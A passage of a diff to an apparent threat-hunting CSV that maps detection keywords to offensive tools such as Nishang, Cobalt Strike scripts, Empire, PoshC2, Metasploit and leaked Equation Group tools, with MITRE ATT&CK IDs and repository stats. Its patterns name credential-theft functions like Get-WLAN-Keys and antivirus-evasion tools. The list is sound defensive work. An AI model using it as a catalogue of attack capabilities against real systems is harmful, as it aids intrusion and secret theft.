TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-WLAN-Keys*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Get-WLAN-Keys.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Get-WLAN-Keys*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-WLAN-Keys.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*getwmiregcachedrdpconnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-wmiregcachedrdpconnection*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregcachedrdpconnection*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*getwmireglastloggedon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-wmireglastloggedon*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-WMIRegMountedDrive*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-wmiregmounteddrive*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmireglastloggedon*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WMIRegMountedDrive*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregmounteddrive*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gexplorer.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*ghost_* -v*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_sparc*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_x86*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*ghost01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ghost01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*GhostInTheNet off*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - 